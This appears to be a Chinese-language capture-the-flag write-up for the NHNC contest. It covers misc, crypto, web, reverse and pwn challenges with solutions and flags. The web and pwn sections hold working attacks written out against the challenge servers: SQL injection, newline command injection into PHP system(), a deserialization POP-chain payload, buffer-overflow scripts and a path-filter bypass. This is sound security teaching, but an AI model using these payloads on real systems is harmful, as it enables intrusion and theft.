Misc#

”A Gift from the Leader Organizer” (1 pt)#

總召大人最帥了😘

NHNC{fishbaby1011sohandsome}

Blog 2 (20 pts)#

1
出題者: Elliot_404
2

3
承上題（Blog 1），這個 Blog 的主人好像洩漏了他不想別讓人知道的東西，請試著找出來

Blog link 在推薦Vtuber文章下的留言區，有neko-2077的留言在他的Disqus留言，有個不要點進來

點進去就可以看到Blog 2了

NHNC{comments_disqusjs}

Blog 3 (50 pts)#

1
出題者: Elliot_404
2

3
承上題（Blog 1），這個 Blog 的主人好像洩漏了他不想讓別人知道的東西，請試著找出來

Blog link

一樣在推薦Vtuber頁面裡，對香香的封面圖右鍵>Open image in new tab

Screenshot 2024-11-18 080214

可以觀察到網址的φ0有點不正常

把後面的照片連結去掉，即可進入Blog 3 Screenshot 2024-11-18 080559

NHNC{image_url}

Where is this (20 pts)#

1
出題者: Elliot_404
2

3
 這在哪裡？
4

5
Flag 格式：NHNC{緯度_經度}
6
（無條件捨去取到小數後三位）
7

8
ex:NHNC{12.345_114.514}

附圖連結:https://nhnc.ic3dt3a.org/files/316ada6f8668dc977279ead9ed301fef/OSINT.jpg

線索是點店名:曾家乾麵、河堤上的貓、竹東排骨酥麵

接著在google map上搜尋即可
註:不建議用曾家乾麵搜尋

我用河堤上的貓在google map上搜尋，只找到一個地方，也符合圖片裡⊥的道路結構

右鍵即可看到經緯度資訊

NHNC{24.802_120.979}

NHNC, but C0LoRfUl (39 pts)#

1
出題者:chilin.h
2

3
https://discord.gg/BhrD6sPtNs
4

5
Everyone is welcome here!
6
I felt that the original server was too old-fashioned, so I added a new coloring function!
7
Whether you are an administrator, a worker, or a participant, you can color your fonts!
8

9
歡迎大家來這邊！
10
我覺得原本的伺服器太古板了，所以新增了上色功能！
11
無論你是管理員、工人、還是參與者，都可以為你的字體上色！

進入Discord Server，發現我們有管理身分組的權限，直接開好開滿

就可以看到多出現了flag channel

解碼base64即可

NHNC{oI*Y1oxk^@vbXLbxXSQ89N3vsW $zoS5\*QQp5riz^q$ Zj9hMc55X*w3sg6CP10bD6cTadaz2aHVjt0qK#nwdiUDt2#9Dj^*Wo5a9$6LecFD&Ir*ewufJ4LEjk0XUCYTe0}

Forensics#

BotNet1 (60 pts)#

1
出題者: whale.120
2

3
Some bad bots (uhh...maybe contracts) are trading on Sepolia Ethernaut test net, the first bot's address is 0xAD840c4c2F869896EfE0891614faA1908dcD0153, find it's pal's address and wrap it in NHNC{}!

進入Sepolia-etherscan，輸入給定的地址
在Internal Transection中，有一筆合約

NHNC{0x3e9e0e9cee22Ccd0ac94604A72394B0A1CCdb27A}

BotNet2 (80 pts)#

1
出題者: whale.120
2

3
You have discovered the suspicious trade, now find the stacked data on it's pal!

進去看上一題解出來的的地址

進去看這筆交易，選Show more，View input as選UTF-8

NHNC{boti_boti_im_in_ur_wifi}

Crypto#

AES? (20 pts)#

1
出題者: LemonTea
2

3
一段加密的訊息，需要破解加密才能解開。

file link-output.txt output.txt:

1
Enter IV: 1234567890987654
2
Secret Key: 1234567890987654
3
output: TkdU8sqjliuakA+nj2aEmbDf+AaJwASfPuooaKadCqg=

隨便找個AES online decryption，選CBC mode

NHNC{Y0u_kn0w_AES}

Baby RSA (40 pts)#

1
出題者: whale.120
2

3
RSA for babys

file link-chal_17.py

1
from Crypto.Util.number import *
2
from Secret import flag1
3
primes=[getPrime(512) for _ in range(3)]
4
p, q, r=primes[0], primes[1], primes[2]
5
n=p*q*r
6
e=0x10001
7
leak=p*q+q*r+r*p-p-q-r
8
c=pow(bytes_to_long(flag1), e, n)
9
print(f"{n=}\n{e=}\n{c=}\n{leak=}")
10

11
# output
12
'''
13
n=1588313940811583670388901008799979643227508347921726508187845925121888018384295030557217724452854073354506733734948963728906121944748626336175026165501032867164031437646285616387352213662865798266568754187475074439344239971434650851017361305440785085800565077621928128381888304170806890898358358161543138717722884498671012157552627202558915649163030193095159221015850832580026640394276672929163085422040567666556330271222397965912435822921196421000606733571473897
14
e=65537
15
c=1486820855515154236162411677801199668086445706624424596450332681618232039310031299864777925283743527869824964609902697207891204276017844138716399611186082902687240749084575448807382032315300097699346046330339044585017938639264266759415446628256358731949386881533600592561504081326543143711535184034996293644573109963922652147003096600799028140241574358077390864861527823922494294399292630017130705549749378273155565300089441218224857894833601009764541100666507221
16
leak=409806027984142046827568136516718279278250684987305418639665531440726724145235686048985209175210488783213754343387799291126405560172391062085673659617777577945402272340754442512900552853645251776025848281268240863874332635558325107405944737687367206917286149877313697949861173539315761823960563606616395256712
17
'''

整理一下已知資訊:

$n = p \cdot q \cdot r$
$leak = pq + qr + rp - p - q - r$

這樣，我們就可以開始計算 $\varphi (n)$ :

$\varphi (n) = (p - 1) (q - 1) (r - 1)$

展開:

$\varphi (n) = pqr - pq - pr - qr + p + q + r - 1$

n和leak帶入 $\varphi (n)$ 可得:

$\varphi (n)=n - \text{leak} - 1$

exploit:

1
from Crypto.Util.number import *
2

3
n = 1588313940811583670388901008799979643227508347921726508187845925121888018384295030557217724452854073354506733734948963728906121944748626336175026165501032867164031437646285616387352213662865798266568754187475074439344239971434650851017361305440785085800565077621928128381888304170806890898358358161543138717722884498671012157552627202558915649163030193095159221015850832580026640394276672929163085422040567666556330271222397965912435822921196421000606733571473897
4
e = 65537
5
c = 1486820855515154236162411677801199668086445706624424596450332681618232039310031299864777925283743527869824964609902697207891204276017844138716399611186082902687240749084575448807382032315300097699346046330339044585017938639264266759415446628256358731949386881533600592561504081326543143711535184034996293644573109963922652147003096600799028140241574358077390864861527823922494294399292630017130705549749378273155565300089441218224857894833601009764541100666507221
6
leak = 409806027984142046827568136516718279278250684987305418639665531440726724145235686048985209175210488783213754343387799291126405560172391062085673659617777577945402272340754442512900552853645251776025848281268240863874332635558325107405944737687367206917286149877313697949861173539315761823960563606616395256712
7

8
phi_n = n - leak - 1
9
d = inverse(e, phi_n)
10
m = pow(c, d, n)
11
flag = long_to_bytes(m)
12
print(flag)

NHNC{baby_math_won}

Secret ROT13 (40 pts)#

1
出題者: LemonTea
2

3
一段加密的訊息，需要破解加密才能解開。

file link-output.txt file link-source.py source.py:

1
def encrypt(text, key):
2
    encrypted_text = ""
3
    for i, char in enumerate(text):
4
        offset = ((i + 1 + key) * (i + 1)) % 26
5
        if 'A' <= char <= 'Z':
6
            new_char = chr((ord(char) - ord('A') + offset) % 26 + ord('A'))
7
        elif 'a' <= char <= 'z':
8
            new_char = chr((ord(char) - ord('a') + offset) % 26 + ord('a'))
9
        else:
10
            new_char = char
11
        encrypted_text += new_char
12
    return encrypted_text
13

14
# 測試範例
15
key = 7
16
plaintext = "NHNC{TEST}"
17
ciphertext = encrypt(plaintext, key)
18
print("加密後的密文:", ciphertext)

output.txt:

1
VZRU{Y0k_yd0w_Z0o_ti_rsslyxli}

每個字元的加密是基於其位置 i 和給定的密鑰 key $\text{offset} = ((i + 1 + \text{key}) \times (i + 1)) \% 26$

反向操作，把offset減掉，然後還原到對應的ASCII範圍

最後暴力找key

exploit:

1
def decrypt(encrypted_text, key):
2
    decrypted_text = ""
3
    for i, char in enumerate(encrypted_text):
4
        offset = ((i + 1 + key) * (i + 1)) % 26
5
        if 'A' <= char <= 'Z':
6
            new_char = chr((ord(char) - ord('A') - offset) % 26 + ord('A'))
7
        elif 'a' <= char <= 'z':
8
            new_char = chr((ord(char) - ord('a') - offset) % 26 + ord('a'))
9
        else:
10
            new_char = char
11
        decrypted_text += new_char
12
    return decrypted_text
13

14
for i in range(1, 26):
15
    print(decrypt("VZRU{Y0k_yd0w_Z0o_ti_rsslyxli}", i))

1
└─$ python3 epx_rot13.py | grep NHNC
2
NHNC{Y0u_kn0w_H0w_to_decrypte}

NHNC{Y0u_kn0w_H0w_to_decrypte}

Ande Yo Caliente (60 pts)#

1
出題者: whale.120
2

3
Chacha~

file link

chal.py:

1
from Crypto.Cipher import ChaCha20
2
from secret import FLAG
3
import os
4
def encrypt(message, key, nonce):
5
    cipher = ChaCha20.new(key=key, nonce=iv)
6
    ciphertext = cipher.encrypt(message)
7
    return ciphertext
8
message = b'When you feel my heat, look into my eyes\nIt\'s where my demons hide'
9
key, iv = os.urandom(32), os.urandom(12)
10
encrypted_message = encrypt(message, key, iv)
11
encrypted_flag = encrypt(FLAG, key, iv)
12
data = iv.hex() + '\n' + encrypted_message.hex() + '\n' + encrypted_flag.hex()
13
f=open("out.txt", "w")
14
f.write(data)
15
'''
16
out.txt:
17
635b52504ab86d67d780dede
18
eab3ee7a3821847b76558eb61ec26f4fc7f72f436966ab7680d652b872c85c0bae4879db0748b02dde7df7ca34288a0fa21bd8889c57d3ff986a9566f09733cfbc6e
19
f393c557632f836f226c828c1e87634489fa2e7d7b38e477b0d14dfa66
20
'''

這題給了一個明文的message/加密過的message，還有加密過的flag，以及加密兩者的IV(ChaCha20的nonce)

但ChaCha20的加密法是生成一個keystream再XOR

$\text{ciphertext} = \text{keystream} \oplus \text{text}$

所以其實不用IV也沒差?

所以就利用XOR的特性，用給定的明/密文得到keystream

再用keystream解flag

exploit:

1
from Crypto.Cipher import *
2
from binascii import *
3

4
#iv = unhexlify("635b52504ab86d67d780dede")
5
encrypted_message = unhexlify("eab3ee7a3821847b76558eb61ec26f4fc7f72f436966ab7680d652b872c85c0bae4879db0748b02dde7df7ca34288a0fa21bd8889c57d3ff986a9566f09733cfbc6e")
6
encrypted_flag = unhexlify("f393c557632f836f226c828c1e87634489fa2e7d7b38e477b0d14dfa66")
7

8
message = b"When you feel my heat, look into my eyes\nIt's where my demons hide"
9

10
stream = bytes([m ^ c for m, c in zip(message, encrypted_message)])
11
flag = bytes([c ^ s for c, s in zip(encrypted_flag, stream)])
12

13
print(flag.decode())

NHNC{what_i_learned_from_htb}

Duplicated (255 pts)#

1
I don't know what to say, just a tricky but kinda easy one.
2

3
Do you catch your breath when I look at you?
4
Are you holding back, like the way I do?
5
URL: http://23.146.248.134:31337/check

file link

source.py:

1
from flask import Flask, request, jsonify
2
import base64
3
import hashlib
4

5
app = Flask(__name__)
6

7
def base64_decode(data):
8
    try:
9
        return base64.b64decode(data)
10
    except Exception:
11
        return None
12

13
def validate_pair(data1, data2):
14
    decoded1 = base64_decode(data1)
15
    decoded2 = base64_decode(data2)
16

17
    if decoded1 is None or decoded2 is None:
18
        return False
19
    if b"whale_meowing" not in decoded1 or b"whale_meowing" not in decoded2:
20
        return False
21

22
    md5_1 = hashlib.md5(decoded1).hexdigest()
23
    md5_2 = hashlib.md5(decoded2).hexdigest()
24
    return md5_1 == md5_2
25

26
@app.route('/check', methods=['POST'])
27
def check():
28
    try:
29
        data = request.get_json()
30

31
        if not isinstance(data, list) or not all(isinstance(pair, list) and len(pair) == 2 for pair in data):
32
            return jsonify({"status": "wrong", "error": "Invalid input format"}), 400
33

34
        if len(data) != 100:
35
            return jsonify({"status": "wrong", "error": "Exactly 100 pairs required"}), 400
36

37
        all_inputs = [item for pair in data for item in pair]
38
        if len(all_inputs) != len(set(all_inputs)):
39
            return jsonify({"status": "wrong", "error": "Duplicate inputs found"}), 400
40

41
        for pair in data:
42
            if not validate_pair(pair[0], pair[1]):
43
                return jsonify({"status": "wrong"}), 200
44

45
        return jsonify({"status": "NHNC{FAKE_FLAG}"}), 200
46

47
    except Exception as e:
48
        return jsonify({"status": "wrong", "error": str(e)}), 500
49

50
if __name__ == '__main__':
51
    app.run(host="0.0.0.0", port=31337)

他會接收一個長度為100的data

然後data裡面包含一個list，裡面放兩個Base64編碼過的字串

最後做驗證:

沒有重複的Base64字串
Base64解碼後必須包含whale_meowing
List內兩個字串MD5雜湊過必須要一樣

~~然後透過ChatGPT~~，發現Base64有個特性:解碼時會忽略空格、!、-等不支援的字元

稍微實驗一下:

1
>>> base64.b64decode("YWJj".encode())
2
b'abc'
3
>>> base64.b64decode("Y W J j".encode())
4
b'abc'
5
>>> base64.b64decode("Y W!Jj".encode())
6
b'abc'
7
>>> base64.b64decode("Y!W\nJ\rj".encode())
8
b'abc'
9
>>> base64.b64decode("Y!W\nJ~ j_.-".encode())
10
b'abc'

真的ㄟ，好扯ㄛ

這樣就可以寫exploitㄌ:

1
import requests
2
import base64
3

4
url = "http://23.146.248.134:31337/check"
5

6
def generate_variants(encoded_str, existing_set):
7
    variants = set()
8
    for i in range(2):
9
        new_str = ''
10
        for c in encoded_str:
11
            new_str += c
12
        if(i==1):
13
            new_str += ' '
14
        new_str += ' '
15
        variants.add(new_str)
16
        existing_set.add(new_str)
17
    return list(variants)
18

19
data = []
20
all_inputs_set = set()
21

22
for i in range(100):
23
    content = f"whale_meowing_{i}".encode()
24
    base_encoded = base64.b64encode(content).decode()
25
    variants = generate_variants(base_encoded,all_inputs_set)
26
    data.append(variants)
27

28
response = requests.post(url, json=data)
29
print(response.json())

NHNC{is_md_an_abbreviation_for_maid?}

Web#

哥布林保衞部公告 (30 pts)#

1
出題者: 哥布林長老-Frank
2

3
為保護我哥布林族同胞，本保衛部特出此公告以保護我們免於精靈族的誘惑！
4
HINT:用Burp suite抓看看嗎 要這麼麻煩嗎

Link:https://nhnc-ctf-frank.dypc.cc/

直接View page source

NHNC{BeCareful!}

EASY METHOD (100 pts)#

1
I "PUT" something in the website, could u find the "METHOD" to get it?
2

3
http://23.146.248.227:60001/

用browser打開

推測應該要用不同的method，結合提敘，推測用PUT

用curl抓下來

1
└─$ curl -X PUT http://23.146.248.227:60001/
2
<!DOCTYPE html>
3
<html lang="en">
4
<head>
5
    <meta charset="UTF-8">
6
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
7
    <title>HTTP Method Challenge</title>
8
</head>
9
<body>
10
    <h1>這是我的網站</h1>
11
    <p>來找找看我存在這裡的酷酷資料</p>
12

13
    <p><strong>FLAG: NHNC{Y0u_kn0w_H0w_t0_us3_CURL}</strong></p></body>
14
</html>

NHNC{Y0u_kn0w_H0w_t0_us3_CURL}

I need to get the C00kies (100 pts)#

1
出題者: LemonTea
2

3
I am making a web that can show something but I can't become an admin and get the cookies can you help me?
4
http://chal.nhnc.ic3dt3a.org:60002/

連進去長這樣:

在Application > Cookies，可以看到目前的role是user:

右鍵Edit Value改admin，Reload Page

NHNC{You_Kn0w_H0w_t0_chang3_th3_c00ki3}

1
Just login and get the flag
2

3
http://chal.nhnc.ic3dt3a.org:60003/

就一個很簡單的Login Page，直覺SQL Injection

當時啥都沒想，隨便構造一個payload: admin' OR 1=1--

…然後就打進去了XDDD

NHNC{S1mp|e_-_SQL!}

1 line php (300 pts)#

1
1 line >w<b
2

3
http://chal.nhnc.ic3dt3a.org:60000
4
Hint:
5
Flag is at /

連進去: 一個很簡單的php木馬，但發現前面插了一個註解符號，變成不會執行system()函數

我們可以用換行的方式規避掉

cmd參數用%0Als%20/(%0A是換行的URL編碼): flag的檔案是flag-

payload: http://chal.nhnc.ic3dt3a.org:60000/?cmd=%0A%20cat%20/flag-

NHNC{enter_is_always_the_best}

Democracy (350 pts)#

1
出題者: Frank
2

3
The Republic of Frank National Assembly needs your participation! Head over here
4

5
Hint:
6
FOSS-Its means Open for what?

Link:https://nhnc-ctf-frank2.dypc.cc/

按下我要覆議按鈕，會被rick roll

但看他的跳轉連結，是導向/next

用Burp Suite，攔封包看HTTP History

只專注在/next的response

裡面的內容很多很亂，但最後可以看到:

用Dev mode > Console就可以看到了(記得用burp suite卡著)

NHNC{That’sEasyRight?}

POPcorn (460 pts)#

1
Do you know what's a POP Chain?
2
flag is in /flag
3

4
http://chal.nhnc.ic3dt3a.org:60008/

點開出現一個輸入框，還有網頁原始碼

題目告訴我們是php反序列化漏洞

只關注php的部分:

1
<?php
2
class WHALE{
3
    public function __construct($name, $report_uri)
4
    {
5
        $this->name = $name;
6
        $this->report_uri = $report_uri;
7
    }
8

9
    public function __get($obj)
10
    {
11
        $curl = curl_init();
12
        curl_setopt($curl, CURLOPT_URL, $this->report_uri);
13
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
14
        $response = curl_exec($curl);
15
        echo $response;
16
    }
17

18
    public function __wakeup()
19
    {
20
        echo "NHNC{FAKE_FLAG}";
21
    }
22

23
}
24

25
class MEOW{
26
    public function __construct($cat_struct)
27
    {
28
        $this->id = $cat_struct;
29
        echo $this->id->name;
30
    }
31
    public function __toString()
32
    {
33
        return     $this->id->r3a1_name;
34
    }
35
    public function __sleep()
36
    {
37
        return "serialized >w<b, but I want to sleep :zzz:";
38
    }
39
}
40

41
class TEST{
42
    public function __construct($note, $url)
43
    {
44
        $this->note = $note;
45
        $this->url = $url;
46
    }
47
    public function __destruct()
48
    {
49
        if (preg_match('pwned', $this->url))
50
        {
51
            system('echo `date` >> log.txt');
52
        };
53
    }
54
}
55

56
if (isset($_POST['pop'])){
57
    unserialize(base64_decode($_POST['pop']));
58
}
59
?>

首先要理解php的Magic Method

__wakeup() : object被deserialization時自動調用
__destruct() : object的lifecycle結束(被Destruction)自動調用
__get() : 訪問未定義時自動調用

然後我們會發現:

php腳本結束時，會自動調用TEST::__destruct()

裡面的grep_match('pwned', $this->url)第二個參數應該是string，但$this->url是一個object

這時候就會自動觸發MEOW::__toString()，裡面又訪問了$this->id->r3a1_name

但r3al_name沒被定義，這時候觸發WHALE::__get()(__get(r3al_name))

然後get裡面執行了curl請求

payload目標:__get()請求內的curl(r3al_name)改為curl(file:///flag)

撰寫exploit:

1
<?php
2
class WHALE{
3
    public function __construct($name, $report_uri)
4
    {
5
        $this->name = $name;
6
        $this->report_uri = $report_uri;
7
    }
8
}
9

10
class MEOW{
11
    public function __construct($cat_struct)
12
    {
13
        $this->id = $cat_struct;
14
    }
15
}
16

17
class TEST{
18
    public function __construct($note, $url)
19
    {
20
        $this->note = $note;
21
        $this->url = $url;
22
    }
23
}
24
$whale = new WHALE('abc', 'file:///flag');
25
$meow = new MEOW($whale);
26
$test = new TEST('test', $meow);
27

28
$serialized = serialize($test);
29
$payload = base64_encode($serialized);
30
echo $payload;
31
?>

傳送payload:

1
└─$ curl -X POST -d "pop=Tzo0OiJURVNUIjoyOntzOjQ6Im5vdGUiO3M6NDoidGVzdCI7czozOiJ1cmwiO086NDoiTUVPVyI6MTp7czoyOiJpZCI7Tzo1OiJXSEFMRSI6Mjp7czo0OiJuYW1lIjtzOjM6ImFiYyI7czoxMDoicmVwb3J0X3VyaSI7czoxMjoiZmlsZTovLy9mbGFnIjt9fX0=" http://chal.nhnc.ic3dt3a.org:60008/index.php
2
NHNC{FAKE_FLAG}NHNC{is_pop_chain_a_kind_of_injection_?_anyway_is_the_best_language_for_hackers}

NHNC{is_pop_chain_a_kind_of_injection_?_anyway_is_the_best_language_for_hackers}

Reverse#

easyyyyyyyyyy (50 pts)#

1
author: kohiro
2

3
No more hint because it is so eazyyyyyyyyy

file link

用radare2分析，afl看到:

1
0x00401550    1     27 dbg.flag()

VV進去:

NHNC{this_is_a_easy_one}

Guess the num (200 pts)#

1
出題者：raymond
2

3
只有幸運的人才會拿到 flag。不幸運的人啊～今天不是你拿分數的好日子！

file link

這邊用IDA打開

main函式裡:

1
  srand(0x1234u);
2
  printf("Lottery! Enter your number: ");
3
  __isoc99_scanf("%u", &v5);
4
  v3 = v5 % 0xFF;
5
  if ( v3 == rand() % 255 )
6
  {
7
    printf("You're blessed today! Here's your flag: %s\n", flag);
8
    puts("Caution ahead! You will be *DISQUALIFIED* if you share the flag; not everyone has the luck you do!");
9
  }
10
  else
11
  {
12
    puts("You shall not pass! Only those who have luck can get the flag!");
13
  }

flag是在全域變數，直接點開看是NHNC{as_clear_as_plaintext}

但提交是顯示錯誤，回去看看有那些函式

發現了sub_1217()，裡面有存取到flag讓我很在意:

1
_BYTE *sub_1217()
2
{
3
  __int64 v0; // rax
4
  _BYTE *result; // rax
5
  //flag = 'NHNC{as_clear_as_plaintext}'
6
  v0 = sub_11E9(&flag[0x10000]);
7
  *(_BYTE *)(v0 + 5) += 19;
8
  *(_DWORD *)(v0 + 6) -= 117440001;
9
  *(_WORD *)(v0 + 10) = 24420;
10
  *(_QWORD *)(v0 + 12) ^= 0x3E0304001D163016uLL;
11
  *(_DWORD *)(v0 + 20) = 1919906916;
12
  *(_BYTE *)(v0 + 24) = 125;
13
  result = (_BYTE *)(v0 + 25);
14
  *result = 0;
15
  return result;
16
}

sub_11E9():

1
__int64 __fastcall sub_11E9(__int64 a1)
2
{
3
  if ( rand() == -70111375 )
4
    return a1;
5
  else
6
    return a1 - 0x10000;
7
}

仔細分析sub_1217():

flag[0x10000]其實就是flag[0]的地址往後偏移0x10000
rand()會回傳的就只有正數，所以sub_11E9()只會回傳a1 - 0x10000 →v0 = flag[0] 剩下怕會計算錯誤，這邊直接把code轉換成一般的C語言執行:

1
#include <stdio.h>
2
#include <stdint.h>
3
int main() {
4
    char flag[27] = "NHNC{as_clear_as_plaintext}";
5
    //sub_1217()
6
    int64_t v0 = (int64_t)(&flag[0]);
7

8
    flag[5] += 19;
9

10
    uint32_t *ptr_dword = (uint32_t *)(v0 + 6);
11
    *ptr_dword -= 117440001;
12

13
    uint16_t *ptr_word = (uint16_t *)(v0 + 10);
14
    *ptr_word = 24420;
15

16
    uint64_t *ptr_qword = (uint64_t *)(v0 + 12);
17
    *ptr_qword ^= 0x3E0304001D163016uLL;
18

19
    uint32_t *ptr_dword_2 = (uint32_t *)(v0 + 20);
20
    *ptr_dword_2 = 1919906916;
21
    flag[24] = 125;
22
    flag[25] = '\0';
23
    printf(flag);
24
    return 0;
25
}

NHNC{traced_down_to_dtor}

PWN#

Grading system (100 pts)#

1
出題者：Raymond
2

3
線上評分系統！幫你的學生登記分數的好工具！
4

5
nc chal.nhnc.ic3dt3a.org 2003

file link

稍微看一下source code，在switch choice時，有個選項可以開shell:

1
case 'S':
2
    if (is_admin) {
3
        spawn_shell();
4
        break;
5
    } else {
6
        puts("Contact admin if you a bug occurred");
7
        break;
8
    }

原本在想要怎麼用buffer overflow蓋掉is_admin，但發現初始值是1234

我:???

所以exploit很簡單:

1
from pwn import *
2

3
r = remote("chal.nhnc.ic3dt3a.org",2003)
4

5
r.sendlineafter('Number of students: ',b'114514')
6
r.sendlineafter('Your choice:',b'S')
7
r.interactive()
8
r.close()

1
$ ls
2
chal
3
flag
4
run.sh
5
$ cat flag
6
NHNC{i_dont_think_you_are_a_teacher}
7
exit

NHNC{i_dont_think_you_are_a_teacher}

DOF (100 pts)#

1
出題者：whale.120
2

3
I've heard that you just learned overflow, show me twice!
4

5
nc chal.nhnc.ic3dt3a.org 2000

file link

丟IDA:

1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  __int64 v3; // rdx
4
  __int64 v4; // rcx
5
  __int128 v6; // [rsp+0h] [rbp-30h] BYREF
6
  char v7[14]; // [rsp+10h] [rbp-20h] BYREF
7
  __int16 v8; // [rsp+1Eh] [rbp-12h]
8
  unsigned __int64 v9; // [rsp+28h] [rbp-8h]
9

10
  v9 = __readfsqword(0x28u);
11
  v6 = 0LL;
12
  strcpy(v7, "cat_say_meow");
13
  v7[13] = 0;
14
  v8 = 0;
15
  setvbuf(stdin, 0LL, 2, 0LL);
16
  setvbuf(_bss_start, 0LL, 2, 0LL);
17
  printf("What's you name:");
18
  ((void (__fastcall *)(__int128 *))gets)(&v6);
19
  if ( strstr(v7, "cat_sleeping") )
20
    secret_d00r(v7, "cat_sleeping", v3, v4);
21
  puts(v7);
22
  return 0;
23
}

看到gets()和題敘就可以猜到是buffer overflow了

目前main裡的目標是進入secret_d00r()

所以要想辦法用BOF蓋掉v7

然後我比較喜歡看上面IDA給的註解:

1
v9 [rbp-8h]
2
v8 [rbp-12h]
3
v7 [rbp-20h]

蓋掉v9+v8(0x12)，後面接上cat_sleeping

接著就可以進入secret_d00r:

1
int secret_d00r()
2
{
3
  __int64 v0; // rdx
4
  __int64 v1; // rcx
5
  __int64 v2; // r8
6
  __int64 v3; // r9
7
  char v5; // [rsp+7h] [rbp-19h]
8
  FILE *stream; // [rsp+8h] [rbp-18h]
9
  void *v7; // [rsp+10h] [rbp-10h]
10
  void *dest; // [rsp+18h] [rbp-8h]
11

12
  stream = fopen("flag", "r");
13
  if ( !stream )
14
  {
15
    puts("System Error...:(");
16
    exit(1);
17
  }
18
  v7 = malloc(0x14uLL);
19
  dest = malloc(0x14uLL);
20
  if ( !v7 || !dest )
21
    exit(0);
22
  memcpy(dest, "whale_meowing", 0xDuLL);
23
  puts("Welcome to the secret d00r");
24
  puts("There's a HEAP of broken doors, can you tell it's name?");
25
  printf("Enter the name: ");
26
  gets(v7, "whale_meowing", v0, v1, v2, v3);
27
  if ( strstr((const char *)dest, "pwn3d!!!") )
28
  {
29
    while ( 1 )
30
    {
31
      v5 = fgetc(stream);
32
      if ( v5 == -1 )
33
        break;
34
      putchar(v5);
35
    }
36
  }
37
  else
38
  {
39
    puts(aIThinkYouHaven);
40
  }
41
  return fclose(stream);
42
}

可以看出當dest內含有”pwn3d!!!”字串，就可以看到flag了

值得注意的是，v7和dest在執行時有用malloc()動態分配空間

我因為怕計算錯誤，寫了個C code模擬看到空間計算offset:

1
#include <stdio.h>
2
#include <stdlib.h>
3

4
int main() {
5
    void *v7;
6
    void *dest;
7

8
    v7 = malloc(0x14uLL);
9
    dest = malloc(0x14uLL);
10

11
    printf("v7: %p\n", v7);
12
    printf("dest: %p\n", dest);
13

14
    free(v7);
15
    free(dest);
16

17
    return 0;
18
}

執行結果:

1
v7: 0xbb32a0
2
dest: 0xbb32c0

可以算出offset = 0xbb32c0 - 0xbb32a0 = 0x20

我們就可以撰寫exploit:

1
from pwn import *
2

3
#r = process('./chal_23')
4
r = remote("chal.nhnc.ic3dt3a.org",2000)
5

6
r.sendline(b'a'*0x12 + b'cat_sleeping')
7
r.recvuntil("Enter the name: ")
8
r.sendline(b'A'*0x20+b'pwn3d!!!')
9
r.interactive()
10
r.close()

NHNC{dof==doblue_over_flow?!?!}

Fishbaby’s Library (300 pts)#

1
出題者: Raymond
2

3
Fishbaby 開了一間圖書館，但是把 flag 鎖在圖書館的禁區，你能夠突破防護措施並讀取 flag 嗎？
4

5
nc chal.nhnc.ic3dt3a.org 2002

file link source code很長，就不放了

最剛開始時，exploit code有放在給的zip檔內

但他們發現時已經有5個人解了

~~很幸運我在那5個人之中~~

所以我在這邊就講講他的 exploit:

1
from pwn import *
2

3
p = remote('chal.nhnc.ic3dt3a.org', 2002)
4

5
p.sendline('S')
6
p.sendline('.')
7
p.sendline('R')
8
p.sendlineafter('Filename? ', '/home/chal/classified/flag')
9

10
flag = p.recvline()
11
log.info(flag)
12

13
p.close()

簡單來說，我們要透過read_file來得到flag

選單按L可以看到底下的內容:

1
Your choice> L
2
licenses/
3
rfcs/
4
classified/
5
hello_world/
6
visitor_notice.txt
7
run.sh
8
chal
9
gallery/

然後在source可以看到，R選項是用於read file

並且在S做Set category時對classified有過濾

1
case 'S':
2
  printf("Which category interests you? ");
3

4
  memset(category, 0x00, sizeof(category));
5
  scanf(" %[^\n./]", category);
6

7
  if (strstr(category, "..") || strstr(category, "/") || strstr(category, "classified")) {
8
    puts("Hacker!");
9
    exit(0xdead);
10
  }

回去看到exploit，輸入順序為:S -> . -> R -> /home/chal/classified/flag

前面S先用.，代表的是當前目錄，用來繞過.. / / / classified

後面R再設定絕對路徑/home/chal/classified/flag

串接後，完整的系統查詢路徑就變成:./home/chal/classified/flag

提交exploit:

NHNC{sneaked_into_forbidden_zone}

Misc#

”A Gift from the Leader Organizer” (1 pt)#

Blog 2 (20 pts)#

Blog 3 (50 pts)#

Where is this (20 pts)#

NHNC, but C0LoRfUl (39 pts)#

Forensics#

BotNet1 (60 pts)#

BotNet2 (80 pts)#

Crypto#

AES? (20 pts)#

Baby RSA (40 pts)#

Secret ROT13 (40 pts)#

Ande Yo Caliente (60 pts)#

Duplicated (255 pts)#

Web#

哥布林保衞部公告 (30 pts)#

EASY METHOD (100 pts)#

I need to get the C00kies (100 pts)#

Login (100 pts)#

1 line php (300 pts)#

Democracy (350 pts)#

POPcorn (460 pts)#

Reverse#

easyyyyyyyyyy (50 pts)#

Guess the num (200 pts)#

PWN#

Grading system (100 pts)#

DOF (100 pts)#

Fishbaby’s Library (300 pts)#